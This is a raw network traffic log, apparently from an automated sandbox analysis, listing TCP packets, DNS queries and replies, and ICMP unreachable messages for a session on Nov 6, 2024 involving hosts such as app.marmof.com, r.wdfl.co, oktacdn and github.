                                                                                                                                              Nov 6, 2024 16:56:12.554052114 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:12.556062937 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:12.556075096 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.402199030 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.402384996 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.410475969 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.410497904 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.410855055 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.410927057 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.412818909 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.412857056 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.696939945 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.696985960 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.697019100 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.697040081 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.697048903 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.697082996 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.697201014 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.697259903 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.697271109 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.697316885 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.700232029 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.700248957 CET443498932.23.209.141192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:13.700263977 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:13.700300932 CET49893443192.168.2.182.23.209.141
                                                                                                                                              Nov 6, 2024 16:56:18.049120903 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:18.049164057 CET4969580192.168.2.18192.229.221.95
                                                                                                                                              Nov 6, 2024 16:56:18.066696882 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:18.066792965 CET8049695192.229.221.95192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:18.066821098 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:56:18.066840887 CET4969580192.168.2.18192.229.221.95
                                                                                                                                              Nov 6, 2024 16:56:25.516077995 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:25.516136885 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:25.516237974 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:25.516463041 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:25.516482115 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:26.361119986 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:26.361485004 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:26.361514091 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:26.362457037 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:26.362787008 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:26.362863064 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:26.407979012 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:36.353892088 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:36.353979111 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:36.354042053 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:36.919028997 CET49895443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:56:36.919059992 CET44349895142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:37.965643883 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:37.965692043 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:37.965867043 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:37.965997934 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:37.966012001 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.082998991 CET49801443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:56:38.083024979 CET44349801151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.566518068 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.566956997 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.566979885 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.568483114 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.568569899 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.568942070 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.569000959 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.569088936 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.569097996 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.611056089 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.715306997 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.715629101 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.716373920 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.716429949 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.716453075 CET4434989635.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:38.716495991 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.716535091 CET49896443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.717080116 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:38.717092991 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.323792934 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.324162960 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:39.324189901 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.325262070 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.325325012 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:39.325639009 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:39.325690031 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.325818062 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:39.325824976 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.325846910 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:39.325881004 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.378977060 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:39.468193054 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.468700886 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              Nov 6, 2024 16:56:39.468751907 CET4434989735.190.80.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:39.468810081 CET49897443192.168.2.1835.190.80.1
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Nov 6, 2024 16:54:45.731514931 CET6025153192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:20.639384985 CET5791653192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:20.639631033 CET5193153192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:20.641174078 CET53609231.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:20.656721115 CET53519311.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:20.660300016 CET53579161.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:20.768707991 CET53613601.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.061707020 CET53622161.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.341057062 CET5199853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:22.341238976 CET5420953192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:22.348820925 CET53542091.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.352125883 CET53519981.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.368702888 CET53549841.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.571391106 CET5286753192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:23.571610928 CET5819353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:23.572779894 CET6287553192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:23.572979927 CET5495053192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:23.578794956 CET53528671.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.579144955 CET53581931.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.580610037 CET53628751.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.581581116 CET53549501.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.944710016 CET53587611.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.953054905 CET4955553192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:23.953180075 CET5755553192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:23.961045980 CET53495551.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.961275101 CET53575551.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.187949896 CET5463053192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.188087940 CET5757953192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.200484037 CET53546301.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.225905895 CET53575791.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.343249083 CET5032553192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.343337059 CET5178653192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.364249945 CET53503251.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.382195950 CET53517861.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.400418043 CET6367353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.400583029 CET5615253192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.407545090 CET53636731.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.409379005 CET53561521.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.765001059 CET5034353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.765187979 CET6126653192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:24.774667025 CET53612661.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.775310040 CET53503431.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.458441019 CET5147553192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:25.458781958 CET5234753192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:25.465851068 CET53514751.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.465867043 CET53523471.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:31.432622910 CET5199453192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:31.432854891 CET5445053192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:31.611038923 CET53544501.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:31.631236076 CET53519941.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.557737112 CET6159353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:33.557957888 CET5424953192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:33.559170961 CET5566453192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:33.559333086 CET4987853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:33.559806108 CET6500853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:33.560064077 CET5763453192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:33.564779997 CET53615931.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.564811945 CET53542491.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.566498041 CET53498781.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.566514969 CET53556641.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.566530943 CET53650081.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:33.566853046 CET53576341.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.557471991 CET6404053192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:34.557658911 CET6293153192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:34.564503908 CET53629311.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.565190077 CET53640401.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.582259893 CET5711153192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:34.582420111 CET5114953192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:34.588970900 CET53571111.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:34.589087963 CET53511491.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.370038033 CET5432653192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:35.370220900 CET5761853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:35.376774073 CET53543261.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.378806114 CET53576181.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.386511087 CET5858853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:35.386696100 CET6049853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:35.393449068 CET53585881.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:35.393709898 CET53604981.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:37.948371887 CET5479353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:37.948530912 CET5187953192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:37.955176115 CET53518791.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:37.955204010 CET53547931.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:38.995613098 CET53568251.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:45.715492010 CET138138192.168.2.18192.168.2.255
                                                                                                                                              Nov 6, 2024 16:55:52.464155912 CET5466753192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:52.464510918 CET6013353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:52.500078917 CET53546671.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.501843929 CET53601331.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.784951925 CET53511791.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.972572088 CET5156853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:57.972743988 CET5719353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:57.980202913 CET6330353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:57.980350971 CET5982253192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:57.980462074 CET53515681.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.981357098 CET53571931.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.988167048 CET53633031.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:58.012017012 CET53598221.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.135256052 CET6374453192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:59.135337114 CET6427953192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:59.155194044 CET53637441.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.180268049 CET53642791.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.235991955 CET5784153192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:59.236146927 CET5415953192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:55:59.242856979 CET53578411.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:59.242986917 CET53541591.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.186973095 CET6290353192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:56:00.187123060 CET5178253192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:56:00.195177078 CET53629031.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:00.195321083 CET53517821.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:20.128360033 CET53536381.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:20.645009041 CET53623301.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:37.956290960 CET5278853192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:56:37.956290960 CET5268653192.168.2.181.1.1.1
                                                                                                                                              Nov 6, 2024 16:56:37.964823008 CET53526861.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:37.964847088 CET53527881.1.1.1192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:49.072864056 CET53584071.1.1.1192.168.2.18
                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                              Nov 6, 2024 16:55:24.226023912 CET192.168.2.181.1.1.1c22a(Port unreachable)Destination Unreachable
                                                                                                                                              Nov 6, 2024 16:55:58.012137890 CET192.168.2.181.1.1.1c278(Port unreachable)Destination Unreachable
                                                                                                                                              Nov 6, 2024 16:55:59.180413008 CET192.168.2.181.1.1.1c278(Port unreachable)Destination Unreachable
                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Nov 6, 2024 16:54:45.731514931 CET192.168.2.181.1.1.10x1629Standard query (0)augloop.office.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:20.639384985 CET192.168.2.181.1.1.10xd8d8Standard query (0)app.marmof.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:20.639631033 CET192.168.2.181.1.1.10x6c9aStandard query (0)app.marmof.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:22.341057062 CET192.168.2.181.1.1.10x6c55Standard query (0)r.wdfl.coA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:22.341238976 CET192.168.2.181.1.1.10x4710Standard query (0)r.wdfl.co65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.571391106 CET192.168.2.181.1.1.10x7c6dStandard query (0)ui-avatars.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.571610928 CET192.168.2.181.1.1.10x7c1fStandard query (0)ui-avatars.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.572779894 CET192.168.2.181.1.1.10xc159Standard query (0)r.wdfl.coA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.572979927 CET192.168.2.181.1.1.10xd3aeStandard query (0)r.wdfl.co65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.953054905 CET192.168.2.181.1.1.10x870bStandard query (0)plausible.ioA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:23.953180075 CET192.168.2.181.1.1.10x64a9Standard query (0)plausible.io65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.187949896 CET192.168.2.181.1.1.10x4474Standard query (0)marmof.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.188087940 CET192.168.2.181.1.1.10xb139Standard query (0)marmof.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.343249083 CET192.168.2.181.1.1.10x3ecaStandard query (0)app.marmof.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.343337059 CET192.168.2.181.1.1.10x5348Standard query (0)app.marmof.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.400418043 CET192.168.2.181.1.1.10x23adStandard query (0)ui-avatars.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.400583029 CET192.168.2.181.1.1.10x7e42Standard query (0)ui-avatars.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.765001059 CET192.168.2.181.1.1.10xda1Standard query (0)plausible.ioA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:24.765187979 CET192.168.2.181.1.1.10x8fc3Standard query (0)plausible.io65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:25.458441019 CET192.168.2.181.1.1.10xf81cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:25.458781958 CET192.168.2.181.1.1.10x53Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:31.432622910 CET192.168.2.181.1.1.10x1134Standard query (0)ns.califragilist.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:31.432854891 CET192.168.2.181.1.1.10xa25bStandard query (0)ns.califragilist.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.557737112 CET192.168.2.181.1.1.10xc4dbStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.557957888 CET192.168.2.181.1.1.10x71bdStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.559170961 CET192.168.2.181.1.1.10x43ccStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.559333086 CET192.168.2.181.1.1.10x3059Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.559806108 CET192.168.2.181.1.1.10x6922Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:33.560064077 CET192.168.2.181.1.1.10x44beStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.557471991 CET192.168.2.181.1.1.10x42a6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.557658911 CET192.168.2.181.1.1.10x3b96Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.582259893 CET192.168.2.181.1.1.10x58d6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:34.582420111 CET192.168.2.181.1.1.10x9d53Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.370038033 CET192.168.2.181.1.1.10x2023Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.370220900 CET192.168.2.181.1.1.10xc56Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.386511087 CET192.168.2.181.1.1.10x42c8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:35.386696100 CET192.168.2.181.1.1.10x91a0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:37.948371887 CET192.168.2.181.1.1.10x9489Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:37.948530912 CET192.168.2.181.1.1.10xed93Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:52.464155912 CET192.168.2.181.1.1.10x5b12Standard query (0)ns.califragilist.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:52.464510918 CET192.168.2.181.1.1.10xa40fStandard query (0)ns.califragilist.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.972572088 CET192.168.2.181.1.1.10x649dStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.972743988 CET192.168.2.181.1.1.10x4554Standard query (0)github.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.980202913 CET192.168.2.181.1.1.10xd523Standard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:57.980350971 CET192.168.2.181.1.1.10x99c9Standard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.135256052 CET192.168.2.181.1.1.10x780fStandard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.135337114 CET192.168.2.181.1.1.10xe5baStandard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.235991955 CET192.168.2.181.1.1.10x25a2Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:59.236146927 CET192.168.2.181.1.1.10x975eStandard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:00.186973095 CET192.168.2.181.1.1.10xeff4Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:00.187123060 CET192.168.2.181.1.1.10xef3eStandard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:37.956290960 CET192.168.2.181.1.1.10x1b40Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:56:37.956290960 CET192.168.2.181.1.1.10xc061Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Nov 6, 2024 16:54:45.738940954 CET1.1.1.1192.168.2.180x1629No error (0)augloop.office.comaugloop-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:20.660300016 CET1.1.1.1192.168.2.180xd8d8No error (0)app.marmof.com159.69.48.31A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:22.348820925 CET1.1.1.1192.168.2.180x4710No error (0)r.wdfl.cod2qumtq956sbet.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:22.352125883 CET1.1.1.1192.168.2.180x6c55No error (0)r.wdfl.cod2qumtq956sbet.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:22.352125883 CET1.1.1.1192.168.2.180x6c55No error (0)d2qumtq956sbet.cloudfront.net18.66.147.86A (IP address)IN (0x0001)false
                                                                                                                                              Nov 6, 2024 16:55:22.352125883 CET1.1.1.1192.168.2.180x6c55No error (0)d2qumtq956sbet.cloudfront.net18.66.147.68A (IP address)IN (0x0001)false
